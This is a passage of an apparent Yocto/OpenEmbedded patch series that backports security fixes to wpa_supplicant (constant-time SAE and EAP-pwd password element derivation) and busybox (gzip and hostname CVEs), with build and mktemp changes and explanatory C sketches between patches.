+--- a/src/crypto/crypto_wolfssl.c
++++ b/src/crypto/crypto_wolfssl.c
+@@ -1042,6 +1042,26 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ mp_int *a;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ a = (mp_int *) crypto_bignum_init();
++ if (!a)
++ return NULL;
++
++ if (mp_set_int(a, val) != MP_OKAY) {
++ os_free(a);
++ a = NULL;
++ }
++
++ return (struct crypto_bignum *) a;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (!n)
+@@ -1168,6 +1188,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_addmod((mp_int *) a, (mp_int *) b, (mp_int *) c,
++ (mp_int *) d) == MP_OKAY ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *m,
+@@ -1181,6 +1214,27 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_sqrmod((mp_int *) a, (mp_int *) b,
++ (mp_int *) c) == MP_OKAY ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ /* TODO */
++ return -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1386,6 +1440,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ ecc_point *point = (ecc_point *) p;
+--
+2.25.1
+
+From 2232d3d5f188b65dbb6c823ac62175412739eb16 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 2/4] dragonfly: Add sqrt() helper function
+
+This is a backport of "SAE: Move sqrt() implementation into a helper
+function" to introduce the helper function needed for the following
+patches.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/dragonfly.c | 34 ++++++++++++++++++++++++++++++++++
+ src/common/dragonfly.h | 2 ++
+ 2 files changed, 36 insertions(+)
+
+diff --git a/src/common/dragonfly.c b/src/common/dragonfly.c
+index 547be66f1561..1e842716668e 100644
+--- a/src/common/dragonfly.c
++++ b/src/common/dragonfly.c
+@@ -213,3 +213,37 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ "dragonfly: Unable to get randomness for own scalar");
+ return -1;
+ }
++
++
++/* res = sqrt(val) */
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res)
++{
++ const struct crypto_bignum *prime;
++ struct crypto_bignum *tmp, *one;
++ int ret = 0;
++ u8 prime_bin[DRAGONFLY_MAX_ECC_PRIME_LEN];
++ size_t prime_len;
++
++ /* For prime p such that p = 3 mod 4, sqrt(w) = w^((p+1)/4) mod p */
++
++ prime = crypto_ec_get_prime(ec);
++ prime_len = crypto_ec_prime_len(ec);
++ tmp = crypto_bignum_init();
++ one = crypto_bignum_init_uint(1);
++
++ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
++ prime_len) < 0 ||
++ (prime_bin[prime_len - 1] & 0x03) != 3 ||
++ !tmp || !one ||
++ /* tmp = (p+1)/4 */
++ crypto_bignum_add(prime, one, tmp) < 0 ||
++ crypto_bignum_rshift(tmp, 2, tmp) < 0 ||
++ /* res = sqrt(val) */
++ crypto_bignum_exptmod(val, tmp, prime, res) < 0)
++ ret = -1;
++
++ crypto_bignum_deinit(tmp, 0);
++ crypto_bignum_deinit(one, 0);
++ return ret;
++}
+diff --git a/src/common/dragonfly.h b/src/common/dragonfly.h
+index ec3dd593eda4..84d67f575c54 100644
+--- a/src/common/dragonfly.h
++++ b/src/common/dragonfly.h
+@@ -27,5 +27,7 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ struct crypto_bignum *_rand,
+ struct crypto_bignum *_mask,
+ struct crypto_bignum *scalar);
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res);
+
+ #endif /* DRAGONFLY_H */
+--
+2.25.1
+
+From fe534b0baaa8c0e6ddeb24cf529d6e50e33dc501 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 3/4] SAE: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/sae.c | 47 +++++++++++++++++++++++++++++++++--------------
+ 1 file changed, 33 insertions(+), 14 deletions(-)
+
+diff --git a/src/common/sae.c b/src/common/sae.c
+index 08fdbfd18173..8d79ed962768 100644
+--- a/src/common/sae.c
++++ b/src/common/sae.c
+@@ -286,14 +286,16 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ int pwd_seed_odd = 0;
+ u8 prime[SAE_MAX_ECC_PRIME_LEN];
+ size_t prime_len;
+- struct crypto_bignum *x = NULL, *qr = NULL, *qnr = NULL;
++ struct crypto_bignum *x = NULL, *y = NULL, *qr = NULL, *qnr = NULL;
+ u8 x_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 x_cand_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qr_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qnr_bin[SAE_MAX_ECC_PRIME_LEN];
++ u8 x_y[2 * SAE_MAX_ECC_PRIME_LEN];
+ int res = -1;
+ u8 found = 0; /* 0 (false) or 0xff (true) to be used as const_time_*
+ * mask */
++ unsigned int is_eq;
+
+ os_memset(x_bin, 0, sizeof(x_bin));
+
+@@ -402,25 +404,42 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ goto fail;
+ }
+
+- if (!sae->tmp->pwe_ecc)
+- sae->tmp->pwe_ecc = crypto_ec_point_init(sae->tmp->ec);
+- if (!sae->tmp->pwe_ecc)
+- res = -1;
+- else
+- res = crypto_ec_point_solve_y_coord(sae->tmp->ec,
+- sae->tmp->pwe_ecc, x,
+- pwd_seed_odd);
+- if (res < 0) {
+- /*
+- * This should not happen since we already checked that there
+- * is a result.
+- */
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(save) == LSB(y): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(sae->tmp->ec, x);
++ if (!y ||
++ dragonfly_sqrt(sae->tmp->ec, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, SAE_MAX_ECC_PRIME_LEN,
++ prime_len) < 0 ||
++ crypto_bignum_sub(sae->tmp->prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ SAE_MAX_ECC_PRIME_LEN, prime_len) < 0) {
+ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ is_eq = const_time_eq(pwd_seed_odd, x_y[prime_len - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ prime_len, x_y + prime_len);
++ os_memcpy(x_y, x_bin, prime_len);
++ wpa_hexdump_key(MSG_DEBUG, "SAE: PWE", x_y, 2 * prime_len);
++ crypto_ec_point_deinit(sae->tmp->pwe_ecc, 1);
++ sae->tmp->pwe_ecc = crypto_ec_point_from_bin(sae->tmp->ec, x_y);
++ if (!sae->tmp->pwe_ecc) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not generate PWE");
++ res = -1;
+ }
+
+ fail:
++ forced_memzero(x_y, sizeof(x_y));
+ crypto_bignum_deinit(qr, 0);
+ crypto_bignum_deinit(qnr, 0);
++ crypto_bignum_deinit(y, 1);
+ os_free(dummy_password);
+ bin_clear_free(tmp_password, password_len);
+ crypto_bignum_deinit(x, 1);
+--
+2.25.1
+
+From 603cd880e7f90595482658a7136fa6a7be5cb485 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 18:52:27 +0200
+Subject: [PATCH 4/4] EAP-pwd: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/eap_common/eap_pwd_common.c | 46 ++++++++++++++++++++++++++-------
+ 1 file changed, 36 insertions(+), 10 deletions(-)
+
+diff --git a/src/eap_common/eap_pwd_common.c b/src/eap_common/eap_pwd_common.c
+index 2b2b8efdbd01..ff22b29b087a 100644
+--- a/src/eap_common/eap_pwd_common.c
++++ b/src/eap_common/eap_pwd_common.c
+@@ -127,7 +127,8 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 qr_or_qnr_bin[MAX_ECC_PRIME_LEN];
+ u8 x_bin[MAX_ECC_PRIME_LEN];
+ u8 prime_bin[MAX_ECC_PRIME_LEN];
+- struct crypto_bignum *tmp2 = NULL;
++ u8 x_y[2 * MAX_ECC_PRIME_LEN];
++ struct crypto_bignum *tmp2 = NULL, *y = NULL;
+ struct crypto_hash *hash;
+ unsigned char pwe_digest[SHA256_MAC_LEN], *prfbuf = NULL, ctr;
+ int ret = 0, res;
+@@ -139,6 +140,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 found_ctr = 0, is_odd = 0;
+ int cmp_prime;
+ unsigned int in_range;
++ unsigned int is_eq;
+
+ if (grp->pwe)
+ return -1;
+@@ -151,11 +153,6 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
+ primebytelen) < 0)
+ return -1;
+- grp->pwe = crypto_ec_point_init(grp->group);
+- if (!grp->pwe) {
+- wpa_printf(MSG_INFO, "EAP-pwd: unable to create bignums");
+- goto fail;
+- }
+
+ if ((prfbuf = os_malloc(primebytelen)) == NULL) {
+ wpa_printf(MSG_INFO, "EAP-pwd: unable to malloc space for prf "
+@@ -261,10 +258,37 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ */
+ crypto_bignum_deinit(x_candidate, 1);
+ x_candidate = crypto_bignum_init_set(x_bin, primebytelen);
+- if (!x_candidate ||
+- crypto_ec_point_solve_y_coord(grp->group, grp->pwe, x_candidate,
+- is_odd) != 0) {
+- wpa_printf(MSG_INFO, "EAP-pwd: Could not solve for y");
++ if (!x_candidate)
++ goto fail;
++
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(y) == LSB(pwd-seed): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(grp->group, x_candidate);
++ if (!y ||
++ dragonfly_sqrt(grp->group, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, MAX_ECC_PRIME_LEN, primebytelen) < 0 ||
++ crypto_bignum_sub(prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + MAX_ECC_PRIME_LEN,
++ MAX_ECC_PRIME_LEN, primebytelen) < 0) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ /* Constant time selection of the y coordinate from the two
++ * options */
++ is_eq = const_time_eq(is_odd, x_y[primebytelen - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + MAX_ECC_PRIME_LEN,
++ primebytelen, x_y + primebytelen);
++ os_memcpy(x_y, x_bin, primebytelen);
++ wpa_hexdump_key(MSG_DEBUG, "EAP-pwd: PWE", x_y, 2 * primebytelen);
++ grp->pwe = crypto_ec_point_from_bin(grp->group, x_y);
++ if (!grp->pwe) {
++ wpa_printf(MSG_DEBUG, "EAP-pwd: Could not generate PWE");
+ goto fail;
+ }
+
+@@ -289,6 +313,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ /* cleanliness and order.... */
+ crypto_bignum_deinit(x_candidate, 1);
+ crypto_bignum_deinit(tmp2, 1);
++ crypto_bignum_deinit(y, 1);
+ crypto_bignum_deinit(qr, 1);
+ crypto_bignum_deinit(qnr, 1);
+ bin_clear_free(prfbuf, primebytelen);
+@@ -296,6 +321,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ os_memset(qnr_bin, 0, sizeof(qnr_bin));
+ os_memset(qr_or_qnr_bin, 0, sizeof(qr_or_qnr_bin));
+ os_memset(pwe_digest, 0, sizeof(pwe_digest));
++ forced_memzero(x_y, sizeof(x_y));
+
+ return ret;
+ }
+--
+2.25.1
+
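The three hostap patches above rest on two ideas: for a prime p with p ≡ 3 (mod 4), a modular square root is w^((p+1)/4) mod p, and the choice between y and p - y is made with constant-time helpers so that no branch depends on the password-derived value. Below is a minimal standalone sketch of such constant-time selection; ct_eq_u8() and ct_select() are illustrative names, not the const_time_* helpers from the hostap tree.

#include <stddef.h>
#include <stdint.h>

/* Return 0xff if a == b, 0x00 otherwise, without a data-dependent branch. */
static uint8_t ct_eq_u8(uint8_t a, uint8_t b)
{
	uint8_t x = a ^ b;                                   /* 0 iff equal */
	uint8_t nonzero = (uint8_t)((x | (uint8_t)-x) >> 7); /* 1 iff x != 0 */
	return (uint8_t)(nonzero - 1);                       /* 0 -> 0xff, 1 -> 0x00 */
}

/* dst = (mask == 0xff) ? a : b, copying len bytes with the same memory
 * access pattern for either outcome. */
static void ct_select(uint8_t mask, const uint8_t *a, const uint8_t *b,
		      size_t len, uint8_t *dst)
{
	size_t i;

	for (i = 0; i < len; i++)
		dst[i] = (uint8_t)((a[i] & mask) | (b[i] & (uint8_t)~mask));
}

Applied to the hunks above, a would hold y, b would hold p - y, and mask would come from comparing the saved parity bit with the low bit of y, mirroring what const_time_eq() and const_time_select_bin() do there.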
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
index 7cc03fef7d..a8fb34b1a1 100644
--- a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
@@ -1,5 +1,6 @@
SUMMARY = "Client for Wi-Fi Protected Access (WPA)"
HOMEPAGE = "http://w1.fi/wpa_supplicant/"
+DESCRIPTION = "wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver."
BUGTRACKER = "http://w1.fi/security/"
SECTION = "network"
LICENSE = "BSD-3-Clause"
@@ -29,6 +30,10 @@ SRC_URI = "http://w1.fi/releases/wpa_supplicant-${PV}.tar.gz \
file://0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch \
file://0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch \
file://0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch \
+ file://CVE-2021-0326.patch \
+ file://CVE-2021-27803.patch \
+ file://CVE-2021-30004.patch \
+ file://CVE-2022-23303-4.patch \
"
SRC_URI[md5sum] = "2d2958c782576dc9901092fbfecb4190"
SRC_URI[sha256sum] = "fcbdee7b4a64bea8177973299c8c824419c413ec2e3a95db63dd6a5dc3541f17"
diff --git a/meta/recipes-core/base-files/base-files/hosts b/meta/recipes-core/base-files/base-files/hosts
index b94f414d5c..10a5b6c704 100644
--- a/meta/recipes-core/base-files/base-files/hosts
+++ b/meta/recipes-core/base-files/base-files/hosts
@@ -1,4 +1,4 @@
-127.0.0.1 localhost.localdomain localhost
+127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
diff --git a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
index d01cd7e297..65b3cd778d 100644
--- a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
+++ b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
@@ -1,5 +1,6 @@
SUMMARY = "Base system master password/group files"
DESCRIPTION = "The master copies of the user database files (/etc/passwd and /etc/group). The update-passwd tool is also provided to keep the system databases synchronized with these master files."
+HOMEPAGE = "https://launchpad.net/base-passwd"
SECTION = "base"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a"
diff --git a/meta/recipes-core/busybox/busybox.inc b/meta/recipes-core/busybox/busybox.inc
index e0522be729..f0c5666f47 100644
--- a/meta/recipes-core/busybox/busybox.inc
+++ b/meta/recipes-core/busybox/busybox.inc
@@ -139,6 +139,10 @@ do_configure () {
do_prepare_config
merge_config.sh -m .config ${@" ".join(find_cfgs(d))}
cml1_do_configure
+
+ # Save a copy of .config and autoconf.h.
+ cp .config .config.orig
+ cp include/autoconf.h include/autoconf.h.orig
}
do_compile() {
@@ -146,13 +150,17 @@ do_compile() {
if [ "${BUILD_REPRODUCIBLE_BINARIES}" = "1" ]; then
export KCONFIG_NOTIMESTAMP=1
fi
+
+ # Ensure we start do_compile with the original .config and autoconf.h.
+ # These files should always have matching timestamps.
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
+
if [ "${BUSYBOX_SPLIT_SUID}" = "1" -a x`grep "CONFIG_FEATURE_INDIVIDUAL=y" .config` = x ]; then
+ # Guard against interrupted do_compile: clean temporary files.
+ rm -f .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+
# split the .config into two parts, and make two busybox binaries
- if [ -e .config.orig ]; then
- # Need to guard again an interrupted do_compile - restore any backup
- cp .config.orig .config
- fi
- cp .config .config.orig
oe_runmake busybox.cfg.suid
oe_runmake busybox.cfg.nosuid
@@ -189,15 +197,18 @@ do_compile() {
bbfatal "busybox suid binary incorrectly provides /bin/sh"
fi
- # copy .config.orig back to .config, because the install process may check this file
- cp .config.orig .config
# cleanup
- rm .config.orig .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+ rm .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
else
oe_runmake busybox_unstripped
cp busybox_unstripped busybox
oe_runmake busybox.links
fi
+
+ # restore original .config and autoconf.h, because the install process
+ # may check these files
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
}
do_install () {
@@ -348,7 +359,7 @@ do_install_ptest () {
# These access the internet which is not guaranteed to work on machines running the tests
rm -rf ${D}${PTEST_PATH}/testsuite/wget
sort ${B}/.config > ${D}${PTEST_PATH}/.config
- ln -s /bin/busybox ${D}${PTEST_PATH}/busybox
+ ln -s ${base_bindir}/busybox ${D}${PTEST_PATH}/busybox
}
inherit update-alternatives
diff --git a/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
new file mode 100644
index 0000000000..b75f0907e7
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
@@ -0,0 +1,51 @@
+From fe791386ebc270219ca00406c9fdadc5130b64ee Mon Sep 17 00:00:00 2001
+From: Samuel Sapalski <samuel.sapalski@nokia.com>
+Date: Wed, 3 Mar 2021 16:31:22 +0100
+Subject: [PATCH] decompress_gunzip: Fix DoS if gzip is corrupt
+
+On certain corrupt gzip files, huft_build will set the error bit on
+the result pointer. If afterwards abort_unzip is called huft_free
+might run into a segmentation fault or an invalid pointer to
+free(p).
+
+In order to mitigate this, we check in huft_free if the error bit
+is set and clear it before the linked list is freed.
+
+Signed-off-by: Samuel Sapalski <samuel.sapalski@nokia.com>
+Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-28831
+Comment: One hunk from this patch is removed as it was not relevant.
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+Signed-off-by: Akash Hadke <Akash.Hadke@kpit.com>
+---
+ archival/libarchive/decompress_gunzip.c | 12 ++++++++++--
+ 1 file changed, 10 insertions(+), 2 deletions(-)
+
+diff --git a/archival/libarchive/decompress_gunzip.c b/archival/libarchive/decompress_gunzip.c
+index eb3b64930..e93cd5005 100644
+--- a/archival/libarchive/decompress_gunzip.c
++++ b/archival/libarchive/decompress_gunzip.c
+@@ -220,10 +220,20 @@ static const uint8_t border[] ALIGN1 = {
+ * each table.
+ * t: table to free
+ */
++#define BAD_HUFT(p) ((uintptr_t)(p) & 1)
++#define ERR_RET ((huft_t*)(uintptr_t)1)
+ static void huft_free(huft_t *p)
+ {
+ huft_t *q;
+
++ /*
++ * If 'p' has the error bit set we have to clear it, otherwise we might run
++ * into a segmentation fault or an invalid pointer to free(p)
++ */
++ if (BAD_HUFT(p)) {
++ p = (huft_t*)((uintptr_t)(p) ^ (uintptr_t)(ERR_RET));
++ }
++
+ /* Go through linked list, freeing from the malloced (t[-1]) address. */
+ while (p) {
+ q = (--p)->v.t;
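The hunk above relies on a low-bit "error tag" stored inside a pointer: huft_build() signals failure by setting bit 0 of the returned table pointer, so huft_free() must strip that bit before it walks and frees the list. A minimal sketch of the same pattern on a generic linked list (illustrative names, not the busybox huft_t code):

#include <stdint.h>
#include <stdlib.h>

struct node { struct node *next; };

#define ERR_BIT      ((uintptr_t)1)   /* malloc results are aligned, so bit 0 is free */
#define MARK_BAD(p)  ((struct node *)((uintptr_t)(p) | ERR_BIT))
#define IS_BAD(p)    (((uintptr_t)(p)) & ERR_BIT)
#define STRIP_BAD(p) ((struct node *)((uintptr_t)(p) & ~ERR_BIT))

static void free_list(struct node *p)
{
	/* Clear the error tag first; dereferencing or freeing a tagged
	 * pointer is what the CVE fix above prevents. */
	if (IS_BAD(p))
		p = STRIP_BAD(p);

	while (p) {
		struct node *q = p->next;
		free(p);
		p = q;
	}
}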
diff --git a/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
new file mode 100644
index 0000000000..18bf5f19e4
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
@@ -0,0 +1,38 @@
+From c7e181fdf58c392e06ab805e2c044c3e57d5445a Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:14:33 +0000
+Subject: [PATCH] libbb: sockaddr2str: ensure only printable characters are
+ returned for the hostname part
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ libbb/xconnect.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libbb/xconnect.c b/libbb/xconnect.c
+index eb2871cb1..b5520bb21 100644
+--- a/libbb/xconnect.c
++++ b/libbb/xconnect.c
+@@ -501,8 +501,9 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ );
+ if (rc)
+ return NULL;
++ /* ensure host contains only printable characters */
+ if (flags & IGNORE_PORT)
+- return xstrdup(host);
++ return xstrdup(printable_string(host));
+ #if ENABLE_FEATURE_IPV6
+ if (sa->sa_family == AF_INET6) {
+ if (strchr(host, ':')) /* heh, it's not a resolved hostname */
+@@ -513,7 +514,7 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ #endif
+ /* For now we don't support anything else, so it has to be INET */
+ /*if (sa->sa_family == AF_INET)*/
+- return xasprintf("%s:%s", host, serv);
++ return xasprintf("%s:%s", printable_string(host), serv);
+ /*return xstrdup(host);*/
+ }
+
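printable_string() is busybox's own libbb helper; the idea it implements is sketched below in a small standalone form, with non-printable bytes replaced before the string reaches the terminal (illustrative code under that assumption, not the libbb implementation):

#include <ctype.h>
#include <stdio.h>

/* Print s with every non-printable byte replaced, so a hostile resolver
 * cannot smuggle terminal escape sequences into the output. */
static void print_sanitized(const char *s)
{
	for (; *s; s++) {
		unsigned char c = (unsigned char)*s;
		putchar(isprint(c) ? c : '?');
	}
}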
diff --git a/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
new file mode 100644
index 0000000000..4a1960dff2
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
@@ -0,0 +1,81 @@
+From ceb378209f953ea745ed93a8645567196380ce3c Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Thu, 24 Jun 2021 19:13:22 +0200
+Subject: [PATCH] mktemp: add tmpdir option
+
+Make mktemp more compatible with coreutils.
+- add "--tmpdir" option
+- add long variants for "d,q,u" options
+
+Upstream-Status: Submitted [http://lists.busybox.net/pipermail/busybox/2021-June/088932.html]
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ coreutils/mktemp.c | 26 ++++++++++++++++++--------
+ 1 file changed, 18 insertions(+), 8 deletions(-)
+
+diff --git a/coreutils/mktemp.c b/coreutils/mktemp.c
+index 5393320a5..05c6d98c6 100644
+--- a/coreutils/mktemp.c
++++ b/coreutils/mktemp.c
+@@ -39,16 +39,17 @@
+ //kbuild:lib-$(CONFIG_MKTEMP) += mktemp.o
+
+ //usage:#define mktemp_trivial_usage
+-//usage: "[-dt] [-p DIR] [TEMPLATE]"
++//usage: "[-dt] [-p DIR, --tmpdir[=DIR]] [TEMPLATE]"
+ //usage:#define mktemp_full_usage "\n\n"
+ //usage: "Create a temporary file with name based on TEMPLATE and print its name.\n"
+ //usage: "TEMPLATE must end with XXXXXX (e.g. [/dir/]nameXXXXXX).\n"
+ //usage: "Without TEMPLATE, -t tmp.XXXXXX is assumed.\n"
+-//usage: "\n -d Make directory, not file"
+-//usage: "\n -q Fail silently on errors"
+-//usage: "\n -t Prepend base directory name to TEMPLATE"
+-//usage: "\n -p DIR Use DIR as a base directory (implies -t)"
+-//usage: "\n -u Do not create anything; print a name"
++//usage: "\n -d Make directory, not file"
++//usage: "\n -q Fail silently on errors"
++//usage: "\n -t Prepend base directory name to TEMPLATE"
++//usage: "\n -p DIR, --tmpdir[=DIR] Use DIR as a base directory (implies -t)"
++//usage: "\n For --tmpdir is a optional one."
++//usage: "\n -u Do not create anything; print a name"
+ //usage: "\n"
+ //usage: "\nBase directory is: -p DIR, else $TMPDIR, else /tmp"
+ //usage:
+@@ -72,13 +73,22 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ OPT_t = 1 << 2,
+ OPT_p = 1 << 3,
+ OPT_u = 1 << 4,
++ OPT_td = 1 << 5,
+ };
+
+ path = getenv("TMPDIR");
+ if (!path || path[0] == '\0')
+ path = "/tmp";
+
+- opts = getopt32(argv, "^" "dqtp:u" "\0" "?1"/*1 arg max*/, &path);
++ opts = getopt32long(argv, "^"
++ "dqtp:u\0"
++ "?1" /* 1 arg max */,
++ "directory\0" No_argument "d"
++ "quiet\0" No_argument "q"
++ "dry-run\0" No_argument "u"
++ "tmpdir\0" Optional_argument "\xff"
++ , &path, &path
++ );
+
+ chp = argv[optind];
+ if (!chp) {
+@@ -95,7 +105,7 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ goto error;
+ }
+ #endif
+- if (opts & (OPT_t|OPT_p))
++ if (opts & (OPT_t|OPT_p|OPT_td))
+ chp = concat_path_file(path, chp);
+
+ if (opts & OPT_u) {
+--
+2.11.0
+
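The patch above uses busybox's getopt32long() with an Optional_argument descriptor. A rough equivalent with the standard GNU getopt_long() API is sketched below (an assumption for illustration, not the busybox code); note that an optional argument must be attached as --tmpdir=DIR, while a bare --tmpdir keeps the $TMPDIR or /tmp default.

#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
	const char *path = getenv("TMPDIR");
	static const struct option longopts[] = {
		{ "tmpdir", optional_argument, NULL, 'T' },
		{ 0, 0, 0, 0 }
	};
	int c;

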